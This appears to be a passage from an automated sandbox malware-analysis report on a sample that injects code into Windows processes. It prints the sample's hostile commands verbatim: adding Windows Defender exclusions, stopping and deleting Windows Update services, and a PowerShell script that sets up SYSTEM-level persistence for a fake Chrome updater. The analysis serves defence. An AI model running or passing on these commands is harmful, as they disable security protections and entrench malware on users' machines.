Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory allocated: C:\Windows\GoogleUpdate.exe base: 1B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory allocated: C:\Windows\GoogleUpdate.exe base: 1B0000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1B0000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Code function: 0_2_0041B189 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_0041B189

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: 1B0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: 1B0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: 1B0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: unknown base address: 1B0000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 7CB008	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Memory written: C:\Windows\System32\dialer.exe base: 62FB36F010	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1B0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1B1000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1C1000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 730000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 732000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 73F000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1B0000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1B1000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 1C1000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 730000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 732000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 73F000

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Google\brave.exe

Thread register set: target process: 5420

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }	Jump to behavior

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Code function: GetLocaleInfoA,

0_2_0041483A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
